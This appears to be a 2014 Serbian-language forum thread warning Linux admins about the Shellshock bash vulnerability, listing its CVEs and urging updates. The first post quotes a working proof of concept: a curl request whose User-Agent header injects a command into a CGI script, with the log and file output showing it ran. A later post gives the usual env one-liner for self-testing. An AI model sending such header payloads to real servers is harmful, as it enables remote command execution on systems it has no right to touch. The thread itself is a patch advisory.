MyCity » Zaštita od zlonamernih programa -> Propusti i ažuriranja » Shellsock - bash remote code execution

Shellsock - bash remote code execution

Napisano na dan: 25.9.2014

Shellsock - bash remote code execution
Sledeća strana Pagination

Idi na vrh

Poslao: 25 Sep 2014 15:52
Idi na vrh
offline
  • Pridružio: 26 Avg 2005
  • Poruke: 384
  • Gde živiš: Beograd

Samo malo obavestenje za sve Linux admine juce je otkriveno da su sve verzije bash-a ranjive. Update jako preporucljiv.
Vise info-a
[Link mogu videti samo ulogovani korisnici]
random primer sa neta:


[root@host cgi-bin]# rm -fr /tmp/aa
[root@host cgi-bin]# cat /var/www/cgi-bin/hi
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "hai"
[root@host cgi-bin]# curl -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa'  https://localhost/cgi-bin/hi
hai
[root@host cgi-bin]#  tail -n1 /var/log/httpd/ssl_access_log
::1 - - [24/Sep/2014:18:22:05 +0200] "GET /cgi-bin/hi HTTP/1.1" 200 4 "-" "() { :;}; echo aa>/tmp/aa"
[root@host cgi-bin]#  ls -l /tmp/aa
-rw-r--r--. 1 apache apache 3 24 sept. 18:22 /tmp/aa



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
Poslao: 28 Sep 2014 08:56
Idi na vrh
offline
  • Pridružio: 17 Jan 2014
  • Poruke: 573
  • Gde živiš: Ulm , Germany

Napisano: 26 Sep 2014 14:20

pogodjeni su i osx i uniix systemi sa ovim
kod ubuntu-a (svih verzija) fix ce biti implementiran putem redovnog update-a
inace, ova "rupa" je prisutna vec duzi niz godina ali opet je tesko koristiti dati propust jer korisnik sam mora da napravi fajl u /var folderu

Dopuna: 28 Sep 2014 8:55

test komanda za proveru je:
 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
postoje 4 ranjivost koje su javne i jedna koja se tek utvrdjuje.
CVE-2014-6271
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187

CVE-2014-6277

detaljniji test vrsi skripta:
script by hannob

ne bi bilo lose da OP promeni naziv teme u #shellsock ili #bashbug



Poslao: 28 Sep 2014 09:18
Idi na vrh
offline
  • bocke  Male
  • Moderator foruma
  • Glavni moderator Linux foruma
  • Veliki Pingvin
  • Guru
  • Pridružio: 16 Dec 2005
  • Poruke: 12543
  • Gde živiš: Južni pol

Pošto imamo forum koji se malo ozbiljnije bavi propustima, premeštam temu tamo.

MyCity » Zaštita od zlonamernih programa -> Propusti i ažuriranja » Shellsock - bash remote code execution

Ko je trenutno na forumu
 

Ukupno su 997 korisnika na forumu :: 69 registrovanih, 7 sakrivenih i 921 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: 04bokibole, 357magnum, A.R.Chafee.Jr., antonije64, Aristotle2002, artmaxa, Atomski čoban, BB, branko7, Bubimir, Car89, Ciri1994, dekan.m, Dimitrise93, Dogma21, DonRumataEstorski, Drugsparrow, Dukelander, dulleo, Electron, Folkstar, Foxhound59, grunff2, jon istvan, Kajzer Soze, kolle.the.kid, komsija1, Kukuvaja, Lazarus, Limeni91, LUDI, mainstream, Marko Marković, marko308, mauglibn, max power, Metanoja, Milanče222, milenko crazy north, monomah, Najax, nemkea71, niksa517, Nmr, Nomica, Novakomp, novator, oldusername, Petarvu, Pikac-47, pristinski korpus, proka89, RajkoB, Regrut Boskica, savaskytec, Saša1989, sekretar, Shinobi, Stoilkovic, synergia, tamno.nebo, Topaz9, Tribal, Trivo, TRZH92, vathra, Vlad000, XBMC, šumar bk2